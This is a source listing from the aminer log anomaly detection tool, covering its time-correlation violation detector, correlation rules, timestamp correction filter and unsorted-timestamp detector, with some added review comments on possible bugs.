This is useful to implement checks as depicted in http://dx.doi.org/10.1016/j.cose.2014.09.006. """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, parallel_check_count, persistence_id="Default", record_count_before_event=10000, output_logline=True, use_path_match=True, use_value_match=True, min_rule_attributes=1, max_rule_attributes=5, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param parallel_check_count number of rule detection checks to run in parallel. @param persistence_id name of persistence file. @param record_count_before_event number of events used to calculate statistics (i.e., window size) @param output_logline specifies whether the full parsed log atom should be provided in the output. 
@param min_rule_attributes minimum number of attributes forming a rule @param max_rule_attributes maximum number of attributes forming a rule @param use_path_match if true rules are build based on path existence @param use_value_match if true rules are built based on actual values """ self.next_persist_time, self.log_success, self.log_total = [None]*3 super().__init__( aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, parallel_check_count=parallel_check_count, persistence_id=persistence_id, record_count_before_event=record_count_before_event, output_logline=output_logline, use_path_match=use_path_match, use_value_match=use_value_match, min_rule_attributes=min_rule_attributes, max_rule_attributes=max_rule_attributes, log_resource_ignore_list=log_resource_ignore_list, mutable_default_args=["log_resource_ignore_list"] ) self.last_timestamp = 0.0 self.last_unhandled_match = None self.total_records = 0 if min_rule_attributes <= 0 or min_rule_attributes > max_rule_attributes: msg = "min_rule_attributes must not be smaller than max_rule_attributes and bigger than or equal to zero." 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.feature_list = [] self.event_count_table = [0] * parallel_check_count * parallel_check_count * 2 self.event_delta_table = [0] * parallel_check_count * parallel_check_count * 2 def receive_atom(self, log_atom): """Receive a log atom from a source.""" for source in self.log_resource_ignore_list: if log_atom.source.resource_name == source: return False self.log_total += 1 event_data = {} timestamp = log_atom.get_timestamp() if timestamp < self.last_timestamp: for listener in self.anomaly_event_handlers: listener.receive_event( f"Analysis.{self.__class__.__name__}", f"Logdata not sorted: last {self.last_timestamp}, current {timestamp}", [log_atom.parser_match.match_element.annotate_match("")], event_data, log_atom, self) return False self.last_timestamp = timestamp self.total_records += 1 features_found_list = [] for feature in self.feature_list: if feature.rule.match(log_atom): feature.trigger_count += 1 self.update_tables_for_feature(feature, timestamp) features_found_list.append(feature) if len(self.feature_list) < self.parallel_check_count: if (random.randint(0, 1) != 0) and (self.last_unhandled_match is not None): # nosec B311 log_atom = self.last_unhandled_match new_rule = self.create_random_rule(log_atom) if new_rule is not None: new_feature = CorrelationFeature(new_rule, len(self.feature_list), timestamp) self.feature_list.append(new_feature) new_feature.trigger_count = 1 self.update_tables_for_feature(new_feature, timestamp) features_found_list.append(new_feature) for feature in features_found_list: feature.last_trigger_time = timestamp if not features_found_list: self.last_unhandled_match = log_atom if (self.total_records % self.record_count_before_event) == 0: result = self.total_records * [""] result[0] = self.analysis_status_to_string() value = log_atom.raw_data if isinstance(value, bytes): value = value.decode(AminerConfig.ENCODING) analysis_component = {"AffectedLogAtomPaths": 
list(log_atom.parser_match.get_match_dictionary()), "AffectedLogAtomValues": [value]} if self.output_logline: feature_list = [] for feature in self.feature_list: tmp_list = {} r = self.rule_to_dict(feature.rule) tmp_list["Rule"] = r tmp_list["Index"] = feature.index tmp_list["CreationTime"] = feature.creation_time tmp_list["LastTriggerTime"] = feature.last_trigger_time tmp_list["TriggerCount"] = feature.trigger_count feature_list.append(tmp_list) analysis_component["FeatureList"] = feature_list analysis_component["AnalysisStatus"] = result[0] analysis_component["TotalRecords"] = self.total_records event_data["AnalysisComponent"] = analysis_component for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "Correlation report", result, event_data, log_atom, self) self.reset_statistics() logging.getLogger(DEBUG_LOG_NAME).debug("%s ran analysis.", self.__class__.__name__) self.log_success += 1 return True def rule_to_dict(self, rule): """Convert a rule to a dict structure.""" r = {"type": str(rule.__class__.__name__)} for var in vars(rule): attr = getattr(rule, var, None) if attr is None: r[var] = None elif isinstance(attr, list): tmp_list = [] for v in attr: d = self.rule_to_dict(v) d["type"] = str(v.__class__.__name__) tmp_list.append(d) r["subRules"] = tmp_list else: r[var] = attr return r def create_random_rule(self, log_atom): """Create a random existing path rule or value match rule.""" parser_match = log_atom.parser_match sub_rules = [] all_keys = list(parser_match.get_match_dictionary().keys()) attribute_count = self.min_rule_attributes + get_log_int(self.max_rule_attributes - self.min_rule_attributes) while attribute_count > 0: key_pos = random.randint(0, len(all_keys) - 1) # nosec B311 key_name = all_keys[key_pos] all_keys = all_keys[:key_pos] + all_keys[key_pos + 1:] key_value = parser_match.get_match_dictionary().get(key_name).match_object # Not much sense handling parsed date values in this implementation, 
so just ignore this attribute. if (isinstance(key_value, tuple)) and (isinstance(key_value[0], datetime)): if not all_keys: break continue attribute_count -= 1 rule_type = 1 # default is value_match only if self.use_path_match and self.use_value_match: rule_type = random.randint(0, 1) # nosec B311 elif self.use_path_match: rule_type = 0 if rule_type == 0: sub_rules.append(Rules.PathExistsMatchRule(key_name)) else: sub_rules.append(Rules.ValueMatchRule(key_name, key_value)) if not all_keys: break if len(sub_rules) > 1: return Rules.AndMatchRule(sub_rules) if len(sub_rules) > 0: return sub_rules[0] return None def update_tables_for_feature(self, target_feature, timestamp): """Assume that this event was the effect of a previous cause-related event. Loop over all cause-related features (rows) to search for matches. """ feature_table_pos = (target_feature.index << 1) for feature in self.feature_list: delta = timestamp - feature.last_trigger_time if delta <= 10.0: self.event_count_table[feature_table_pos] += 1 self.event_delta_table[feature_table_pos] += int(delta * 1000) feature_table_pos += (self.parallel_check_count << 1) feature_table_pos = ((target_feature.index * self.parallel_check_count) << 1) + 1 for feature in self.feature_list: delta = timestamp - feature.last_trigger_time if delta <= 10.0: self.event_count_table[feature_table_pos] += 1 self.event_delta_table[feature_table_pos] -= int(delta * 1000) feature_table_pos += 2 def analysis_status_to_string(self): """Get a string representation of all features.""" result = "" for feature in self.feature_list: trigger_count = feature.trigger_count result += f"{feature.rule} ({feature.index}) e = {trigger_count}:" stat_pos = (self.parallel_check_count * feature.index) << 1 for feature_pos in range(len(self.feature_list)): event_count = self.event_count_table[stat_pos] ratio = "-" if trigger_count != 0: ratio = "%.2e" % (float(event_count) / trigger_count) delta = "-" if event_count != 0: delta = "%.2e" % 
(float(self.event_delta_table[stat_pos]) * 0.001 / event_count) result += "\n %d: {c = %#6d r = %s dt = %s" % (feature_pos, event_count, ratio, delta) stat_pos += 1 event_count = self.event_count_table[stat_pos] ratio = "-" if trigger_count != 0: ratio = "%.2e" % (float(event_count) / trigger_count) delta = "-" if event_count != 0: delta = "%.2e" % (float(self.event_delta_table[stat_pos]) * 0.001 / event_count) result += " c = %#6d r = %s dt = %s}" % (event_count, ratio, delta) stat_pos += 1 result += "\n" return result def reset_statistics(self): """Reset all features.""" for feature in self.feature_list: feature.creation_time = 0 feature.last_trigger_time = 0 feature.trigger_count = 0 self.event_count_table = [0] * self.parallel_check_count * self.parallel_check_count * 2 self.event_delta_table = [0] * self.parallel_check_count * self.parallel_check_count * 2 class CorrelationFeature: """This class defines a correlation feature.""" def __init__(self, rule, index, creation_time): self.rule = rule self.index = index self.creation_time = creation_time self.last_trigger_time = 0.0 self.trigger_count = 0 TimeCorrelationViolationDetector.py000066400000000000000000000463061500476301700400110ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines a detector for time correlation rules. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . 
""" import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.AnalysisChild import AnalysisContext from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util.History import LogarithmicBackoffHistory from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.analysis import Rules class TimeCorrelationViolationDetector(AtomHandlerInterface, TimeTriggeredComponentInterface): """This class creates events when one of the given time correlation rules is violated. This is used to implement checks as depicted in http://dx.doi.org/10.1016/j.cose.2014.09.006 """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, ruleset, anomaly_event_handlers, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param ruleset a list of MatchRule rules with appropriate CorrelationRules attached as actions. @param anomaly_event_handlers for handling events, e.g., print events to stdout. """ self.last_log_atom, self.next_persist_time, self.log_success, self.log_total = [None]*4 super().__init__(aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, log_resource_ignore_list=log_resource_ignore_list, mutable_default_args=["log_resource_ignore_list"]) self.ruleset = ruleset if not isinstance(ruleset, list) or not all(isinstance(x, Rules.MatchRule) for x in ruleset): msg = "ruleset must be a list of MatchRules." 
# NOTE(review): this block starts inside TimeCorrelationViolationDetector.__init__ (the TypeError path for ruleset);
# nesting below was reconstructed from a whitespace-collapsed listing -- verify indentation against upstream.
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        # Collect every CorrelationRule referenced by any selector exactly once (set semantics), so that do_timer
        # polls each rule a single time even when several MatchRules share it.
        event_correlation_set = set()
        for rule in self.ruleset:
            if rule.match_action.artefact_a_rules is not None:
                event_correlation_set |= set(rule.match_action.artefact_a_rules)
            if rule.match_action.artefact_b_rules is not None:
                event_correlation_set |= set(rule.match_action.artefact_b_rules)
        self.event_correlation_ruleset = list(event_correlation_set)

    def receive_atom(self, log_atom) -> None:
        """Receive a parsed atom and evaluate all the classification rules and event triggering on violations.

        Atoms whose source resource_name is listed in log_resource_ignore_list are dropped before being counted.
        Every other atom is handed to each MatchRule in ruleset; the rule actions (EventClassSelector) append to the
        CorrelationRule histories. No event is created here -- violations are only reported from do_timer().
        NOTE(review): the return value of rule.match() is ignored and every non-ignored atom is counted as a success,
        so log_success/log_total say nothing about how many rules matched. Unlike the other handlers in this package
        the method returns None rather than True/False.
        @param log_atom the parsed log atom; the most recent one is remembered in last_log_atom for event reporting.
        """
        for source in self.log_resource_ignore_list:
            if log_atom.source.resource_name == source:
                return
        self.log_total += 1
        self.last_log_atom = log_atom
        for rule in self.ruleset:
            rule.match(log_atom)
        self.log_success += 1

    def do_timer(self, trigger_time):
        """Check every CorrelationRule for violations and emit one event per violated rule.

        NOTE(review): the original docstring also spoke of deciding whether the ruleset should be persisted; no
        persistence happens in this method as visible here.
        @param trigger_time the wall-clock time of this timer call; it is written into last_log_atom before the event
        is sent, so the reported atom carries the detection time rather than the log time.
        @return 10.0, the delay requested until the next call (presumably seconds, as for other timed components -- confirm).
        """
        # Check all correlation rules, generate single events for each violated rule, possibly containing multiple records. As we might
        # be processing historic data, the timestamp last seen is unknown here. Hence, rules not receiving newer events might not notice
        # for a long time, that they hold information about correlation impossible to fulfil. Take the newest timestamp of any rule
        # and use it for checking.
        newest_timestamp = 0.0
        for rule in self.event_correlation_ruleset:
            newest_timestamp = max(newest_timestamp, rule.last_timestamp_seen)
        for rule in self.event_correlation_ruleset:
            check_result = rule.check_status(newest_timestamp)
            if check_result is None:
                continue
            # NOTE(review): mutates the last received atom in place. last_log_atom is None until the first atom arrives;
            # histories only fill through receive_atom() in this class, so this can only fail if the CorrelationRules
            # are shared with another detector.
            self.last_log_atom.set_timestamp(trigger_time)
            # HistoryAEvents/HistoryBEvents are the rule's live lists, not copies; a handler that keeps event_data will
            # see them change as the rule keeps processing.
            r = {"RuleId": rule.rule_id, "MinTimeDelta": rule.min_time_delta, "MaxTimeDelta": rule.max_time_delta,
                 "ArtefactMatchParameters": rule.artefact_match_parameters, "HistoryAEvents": rule.history_a_events,
                 "HistoryBEvents": rule.history_b_events, "LastTimestampSeen": rule.last_timestamp_seen}
            history = {"MaxItems": rule.correlation_history.max_items}
            h = []
            for item in rule.correlation_history.history:
                h.append(repr(item))
            history["History"] = h
            r["correlation_history"] = history
            analysis_component = {"Rule": r, "CheckResult": check_result, "NewestTimestamp": newest_timestamp}
            event_data = {"AnalysisComponent": analysis_component}
            for listener in self.anomaly_event_handlers:
                # NOTE(review): the "log lines" argument is the human-readable message check_result[0]; the list of
                # violating lines check_result[1] is only reachable via event_data["AnalysisComponent"]["CheckResult"].
                # Both embed raw log content from untrusted input -- output handlers must not trust it.
                listener.receive_event(f"Analysis.{self.__class__.__name__}", f'Correlation rule "{rule.rule_id}" violated',
                                       [check_result[0]], event_data, self.last_log_atom, self)
        return 10.0

    def log_statistics(self, component_name):
        """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler.

        After the base class output, each MatchRule in ruleset logs its own statistics under the name
        "<component_name>.<RuleClassName><index>".
        @param component_name the name of the component which is printed in the log line.
        """
        super().log_statistics(component_name)
        for i, rule in enumerate(self.ruleset):
            rule.log_statistics(component_name + "." + rule.__class__.__name__ + str(i))


class EventClassSelector(Rules.MatchAction):
    """This match action selects one event class by adding it to a MatchRule. It then triggers the appropriate CorrelationRules.

    Attach an instance as match_action of a MatchRule: whenever the rule matches, match_action() records the atom as
    artefact A in every rule of artefact_a_rules and as artefact B in every rule of artefact_b_rules.
    """

    def __init__(self, action_id, artefact_a_rules, artefact_b_rules):
        """Create the selector.

        @param action_id non-empty name of this event class; CorrelationRule reports it in violation messages.
        @param artefact_a_rules list of CorrelationRules (or None / []) that receive matching atoms as artefact A.
        @param artefact_b_rules list of CorrelationRules (or None / []) that receive matching atoms as artefact B.
        @raises TypeError if action_id is not a string or a rule argument is not a list of CorrelationRules.
        @raises ValueError if action_id is empty or both rule lists are None/empty.
        """
        if not isinstance(action_id, str):
            msg = "action_id must be a string."
# NOTE(review): this block starts inside EventClassSelector.__init__ (the TypeError path for action_id); nesting
# below was reconstructed from a whitespace-collapsed listing -- verify indentation against upstream.
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if len(action_id) == 0:
            msg = "action_id must not be empty."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if not artefact_a_rules and not artefact_b_rules:
            msg = "At least one of artefact_a_rules and artefact_b_rules must not be None or empty."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        # Normalise None or an empty list to [] so the isinstance checks and match_action() treat both alike.
        if not artefact_a_rules and isinstance(artefact_a_rules, (list, type(None))):
            artefact_a_rules = []
        if not artefact_b_rules and isinstance(artefact_b_rules, (list, type(None))):
            artefact_b_rules = []
        if not isinstance(artefact_a_rules, list) or not isinstance(artefact_b_rules, list) or \
                not all(isinstance(x, CorrelationRule) for x in artefact_a_rules + artefact_b_rules):
            msg = "artefact_a_rules and artefact_b_rules must be lists of CorrelationRules."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        self.action_id = action_id
        self.artefact_a_rules = artefact_a_rules
        self.artefact_b_rules = artefact_b_rules

    def match_action(self, log_atom):
        """Invoke if a rule has matched.

        Records the atom as artefact A in all artefact_a_rules and as artefact B in all artefact_b_rules.
        NOTE(review): CorrelationRule.prepare_history_entry() raises a bare Exception when the atom's timestamp is
        older than the last one that rule saw, so out-of-order input propagates an exception out of the MatchRule.
        @param log_atom the parser match_element that was also matching the rules.
        """
        if self.artefact_a_rules:
            for a_rule in self.artefact_a_rules:
                a_rule.update_artefact_a(self, log_atom)
        if self.artefact_b_rules:
            for b_rule in self.artefact_b_rules:
                b_rule.update_artefact_b(self, log_atom)


class CorrelationRule:
    """This class defines a correlation rule to match artefacts A and B.

    A hidden event A* always triggers at least one artefact A and the hidden event B*, thus triggering also at least
    one artefact B. Observations are appended to history_a_events/history_b_events by the EventClassSelector; pairing
    and violation reporting happen in check_status(), which the detector calls from its timer.
    """

    def __init__(self, rule_id, min_time_delta, max_time_delta, artefact_match_parameters=None, max_violations=20):
        """Create the correlation rule.

        @param rule_id a unique identifier of the rule.
        @param min_time_delta minimal delta in seconds, that artefact B may be observed after artefact A.
        NOTE(review): the original docstring claimed negative values are allowed (B before A), but the check below
        rejects min_time_delta < 0, so B must not precede A.
        @param max_time_delta maximum delta in seconds, that artefact B may be observed after artefact A. Must be
        greater than min_time_delta.
        @param artefact_match_parameters if not none, two artefacts A and B will be only treated as correlated when all the
        parsed artefact attributes identified by the list of attribute path tuples match.
        @param max_violations upper bound on the number of violations listed individually in one check_status() report;
        the remainder is summarised as "... (N more)".
        @raises TypeError for wrongly typed arguments (bool is rejected for the numeric ones).
        @raises ValueError for an empty rule_id or an invalid delta range.
        """
        # Attributes are assigned before validation; a failing check leaves a half-initialised object behind.
        self.rule_id = rule_id
        self.min_time_delta = min_time_delta
        self.max_time_delta = max_time_delta
        self.artefact_match_parameters = artefact_match_parameters
        self.max_violations = max_violations
        # Pending observations, oldest first; entries are the lists built by prepare_history_entry().
        self.history_a_events = []
        self.history_b_events = []
        self.last_timestamp_seen = 0.0
        # Sample of successfully correlated pairs, printed as "Historic examples" in violation messages.
        self.correlation_history = LogarithmicBackoffHistory(10)
        if not isinstance(rule_id, str):
            msg = "rule_id must be a string."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if len(rule_id) == 0:
            msg = "rule_id must not be empty."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if isinstance(min_time_delta, bool) or not isinstance(min_time_delta, (int, float)):
            msg = "min_time_delta must be integer or float."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if isinstance(max_time_delta, bool) or not isinstance(max_time_delta, (int, float)):
            msg = "max_time_delta must be integer or float."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        # min_time_delta == 0 passes this check although the message says "bigger than zero".
        if min_time_delta >= max_time_delta or min_time_delta < 0:
            msg = "min_time_delta must be smaller than max_time_delta and both values must be bigger than zero."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if artefact_match_parameters is not None and (
                not isinstance(artefact_match_parameters, list) or not all(
                    isinstance(x, tuple) and all(isinstance(y, str) for y in x) for x in artefact_match_parameters)):
            msg = "artefact_match_parameters must be a list of tuples of strings."
# NOTE(review): this block starts inside CorrelationRule.__init__ (the TypeError path for artefact_match_parameters);
# nesting below was reconstructed from a whitespace-collapsed listing -- verify indentation against upstream.
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        # No lower bound is enforced: max_violations <= 0 suppresses every per-violation line in check_status().
        if isinstance(max_violations, bool) or not isinstance(max_violations, int):
            msg = "max_violations must be integer."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)

    def update_artefact_a(self, selector, log_atom):
        """Append entry to the event history A.

        @param selector the EventClassSelector whose rule matched; kept in the entry so that violation messages can
        name its action_id.
        @param log_atom the matching atom. Its timestamp must not be older than the last one this rule saw, otherwise
        prepare_history_entry() raises.
        """
        history_entry = self.prepare_history_entry(selector, log_atom)
        # Check if event A could be discarded immediately.
        self.history_a_events.append(history_entry)

    def update_artefact_b(self, selector, log_atom):
        """Append entry to the event history B. Same contract as update_artefact_a()."""
        history_entry = self.prepare_history_entry(selector, log_atom)
        # Check if event B could be discarded immediately.
        self.history_b_events.append(history_entry)

    def check_status(self, newest_timestamp):
        """@return None if status is OK. Return a tuple containing a descriptive message and a list of violating log data lines on error.

        Pending A events are visited oldest first; for each, pending B events are scanned oldest first and classified by
        the delta B - A against [min_time_delta, max_time_delta] and, within range, by equality of the match parameters
        stored at entry positions 4 and up. A good pair is removed from both histories and sampled into
        correlation_history; a violation removes the entries as well and is reported (at most max_violations of them
        individually). Finally, an A event older than newest_timestamp - max_time_delta with no B is reported.
        @param newest_timestamp the newest timestamp seen by any rule of the detector; used instead of wall-clock time
        so that replayed historic data expires consistently.
        NOTE(review): the returned message and line list embed raw log content (match_string) from untrusted input.
        """
        # This part of code would be good target to be implemented as native library with optimized algorithm in the future.
        a_pos = 0
        check_range = len(self.history_a_events)
        violation_logs = []
        violation_message = ""
        num_violations = 0
        while a_pos < check_range:
            deleted = False
            check_range = len(self.history_a_events)
            a_event = self.history_a_events[a_pos]
            # NOTE(review): `continue` without advancing a_pos spins forever on a None entry. prepare_history_entry()
            # never stores None, so this is only reachable if the history lists are modified from outside.
            if a_event is None:
                continue
            a_event_time = a_event[0]
            b_pos = 0
            while b_pos < len(self.history_b_events):
                b_event = self.history_b_events[b_pos]
                # NOTE(review): same non-terminating `continue` as above.
                if b_event is None:
                    continue
                b_event_time = b_event[0]
                delta = b_event_time - a_event_time
                if delta < self.min_time_delta:
                    # See if too early, if yes go to next element. As we will not check again any older aEvents in this loop, skip
                    # all bEvents up to this position in future runs.
                    # NOTE(review): the condition repeats the loop guard and is always true, so the `continue` after it
                    # is dead code; every too-early B ends the scan for this A and removes both entries.
                    if b_pos < len(self.history_b_events):
                        violation_line = a_event[3].match_element.match_string
                        if isinstance(violation_line, bytes):
                            violation_line = violation_line.decode()
                        if num_violations < self.max_violations:
                            violation_message += f"FAIL: B-Event for \"{violation_line}\" ({a_event[2].action_id}) was found too" \
                                                 f" early!\n"
                            violation_logs.append(violation_line)
                        del self.history_a_events[a_pos]
                        del self.history_b_events[b_pos]
                        deleted = True
                        check_range = check_range - 1
                        num_violations = num_violations + 1
                        break
                    continue

                # Too late, no other b_event may match this a_event
                # NOTE(review): the B entry at b_pos is deleted as well although it is only "too late" relative to this
                # A and might still pair with a younger A -- confirm this is intended.
                if delta > self.max_time_delta:
                    violation_line = a_event[3].match_element.match_string
                    if isinstance(violation_line, bytes):
                        violation_line = violation_line.decode()
                    if num_violations < self.max_violations:
                        violation_message += f"FAIL: B-Event for \"{violation_line}\" ({ a_event[2].action_id}) was not found in" \
                                             f" time!\n"
                        violation_logs.append(violation_line)
                    del self.history_a_events[a_pos]
                    del self.history_b_events[b_pos]
                    deleted = True
                    check_range = check_range - 1
                    num_violations = num_violations + 1
                    break

                # So time range is OK, see if match parameters are also equal.
                violation_found = False
                for check_pos in range(4, len(a_event)):
                    if a_event[check_pos] != b_event[check_pos]:
                        violation_line = a_event[3].match_element.match_string
                        if isinstance(violation_line, bytes):
                            violation_line = violation_line.decode()
                        if num_violations < self.max_violations:
                            violation_message += f"FAIL: \"{violation_line}\" ({a_event[2].action_id}) {a_event[check_pos]} is not" \
                                                 f" equal {b_event[check_pos]}\n"
                            violation_logs.append(violation_line)
                        del self.history_a_events[a_pos]
                        del self.history_b_events[b_pos]
                        deleted = True
                        check_range = check_range - 1
                        num_violations = num_violations + 1
                        violation_found = True
                        break
                # NOTE(review): after the mismatch above (and after the good match below) the inner loop goes on with the
                # same local a_event although its history entry is already deleted; a later `del
                # self.history_a_events[a_pos]` then removes a different A. A `break` looks intended -- verify.
                if violation_found:
                    continue

                # We want to keep a history of good matches to ease diagnosis of correlation failures. Keep information about current line
                # for reference.
                self.correlation_history.add_object((a_event[3].match_element.match_string, a_event[2].action_id,
                                                     b_event[3].match_element.match_string, b_event[2].action_id))
                del self.history_a_events[a_pos]
                del self.history_b_events[b_pos]
                deleted = True
                check_range = check_range - 1
                b_pos = b_pos + 1
            if deleted is False:
                a_pos = a_pos + 1

        # After checking all aEvents before a_pos were cleared, otherwise they violate a correlation rule.
        # NOTE(review): the `break` after the first expired A means only one expired A is reported per call; the
        # remaining ones wait for the next timer tick. The `<=` here differs from the `<` used above, so this path
        # can emit one line more than max_violations.
        for a_pos in range(0, check_range):
            a_event = self.history_a_events[a_pos]
            if a_event is None:
                continue
            delta = newest_timestamp - a_event[0]
            if delta > self.max_time_delta:
                violation_line = a_event[3].match_element.match_string
                if isinstance(violation_line, bytes):
                    violation_line = violation_line.decode()
                if num_violations <= self.max_violations:
                    violation_message += f"FAIL: B-Event for \"{violation_line}\" ({a_event[2].action_id}) was not found in time!\n"
                    violation_logs.append(violation_line)
                del self.history_a_events[a_pos]
                deleted = True
                check_range = check_range - 1
                num_violations = num_violations + 1
                break
        if num_violations > self.max_violations:
            violation_message += f"... ({num_violations - self.max_violations} more)\n"
        if num_violations != 0 and len(self.correlation_history.get_history()) > 0:
            violation_message += "Historic examples:\n"
            # NOTE(review): .decode() assumes match_string is bytes; the isinstance guards above admit str as well, and
            # a str record raises AttributeError while the report is built.
            for record in self.correlation_history.get_history():
                violation_message += f' "{record[0].decode()}" ({record[1]}) ==> "{record[2].decode()}" ({record[3]})\n'
        if num_violations == 0:
            return None
        return violation_message, violation_logs

    def prepare_history_entry(self, selector, log_atom):
        """Return a history entry for a parser match.

        The entry is a list: [timestamp, 0 (not read anywhere visible), selector, parser_match, then one slot per
        artefact_match_parameters tuple]. Positions 4 and up are what check_status() compares between A and B.
        @raises Exception ("Timestamps unsorted!") if the atom's timestamp is older than last_timestamp_seen.
        """
        parser_match = log_atom.parser_match
        timestamp = log_atom.get_timestamp()
        length = 4
        if self.artefact_match_parameters is not None:
            length += len(self.artefact_match_parameters)
        result = [None] * length
        result[0] = timestamp
        result[1] = 0
        result[2] = selector
        result[3] = parser_match
        # NOTE(review): an atom without a timestamp (None) makes this comparison raise TypeError.
        if result[0] < self.last_timestamp_seen:
            msg = "Timestamps unsorted!"
# NOTE(review): this block starts inside CorrelationRule.prepare_history_entry (the unsorted-timestamp path);
# nesting below was reconstructed from a whitespace-collapsed listing -- verify indentation against upstream.
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            # NOTE(review): a bare Exception on a single out-of-order timestamp. The timestamp is parsed from log
            # content, i.e. untrusted input, so one forged or skewed line aborts matching for the whole detector.
            # Put SimpleMonotonicTimestampAdjust (TimestampCorrectionFilters) in front of it, or catch this upstream.
            raise Exception(msg)
        self.last_timestamp_seen = result[0]
        if self.artefact_match_parameters is not None:
            pos = 4
            v_dict = parser_match.get_match_dictionary()
            for artefact_match_parameter in self.artefact_match_parameters:
                for param_path in artefact_match_parameter:
                    match_element = v_dict.get(param_path, None)
                    if match_element is not None:
                        result[pos] = match_element.match_object
                        # NOTE(review): with the reconstructed nesting, pos advances per matching path rather than per
                        # tuple; if more than one path of a tuple is present in the same atom, pos runs past the slot
                        # reserved for that tuple and can exceed len(result). Confirm the intended layout.
                        pos += 1
        return result
TimestampCorrectionFilters.py000066400000000000000000000044031500476301700366460ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This file collects various classes useful to filter and correct the timestamp associated with a received parsed atom.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
from aminer.input.InputInterfaces import AtomHandlerInterface


class SimpleMonotonicTimestampAdjust(AtomHandlerInterface):
    """Handlers of this class compare the timestamp of a newly received atom with the largest timestamp seen so far.
    When below, the timestamp of this atom is adjusted to the largest value seen, otherwise the largest value seen is updated.
""" def __init__(self, subhandler_list, stop_when_handled_flag=False): # avoid "defined outside init" issue self.log_success, self.log_total = [None]*2 super().__init__( mutable_default_args=["subhandler_list"], subhandler_list=subhandler_list, stop_when_handled_flag=stop_when_handled_flag) self.latest_timestamp_seen = 0 def receive_atom(self, log_atom): """Pass the atom to the subhandlers. @return false when no subhandler was able to handle the atom. """ self.log_total += 1 if log_atom.get_timestamp() is not None: if log_atom.get_timestamp() < self.latest_timestamp_seen: log_atom.set_timestamp(self.latest_timestamp_seen) else: self.latest_timestamp_seen = log_atom.get_timestamp() result = False for handler, _ in self.subhandler_list: handler_result = handler.receive_atom(log_atom) if handler_result is True: result = True if self.stop_when_handled_flag: break if result: self.log_success += 1 return result TimestampsUnsortedDetector.py000066400000000000000000000074731500476301700367000ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines a detector for unsorted timestamps. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . 
""" import os from aminer.input.InputInterfaces import AtomHandlerInterface from datetime import datetime from aminer.AminerConfig import CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig class TimestampsUnsortedDetector(AtomHandlerInterface): """This class creates events when unsorted timestamps are detected. This is useful mostly to detect algorithm malfunction or configuration errors, e.g. invalid timezone configuration. """ def __init__(self, aminer_config, anomaly_event_handlers, exit_on_error_flag=False, output_logline=True): """Initialize the detector. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param exit_on_error_flag exit the aminer forcefully if a log atom with a wrong timestamp is found. @param output_logline specifies whether the full parsed log atom should be provided in the output. """ # avoid "defined outside init" issue self.log_success, self.log_total = [None]*2 super().__init__(aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, exit_on_error_flag=exit_on_error_flag, output_logline=output_logline) self.last_timestamp = 0 def receive_atom(self, log_atom): """Receive on parsed atom and the information about the parser match. @param log_atom the parsed log atom @return True if this handler was really able to handle and process the match. Depending on this information, 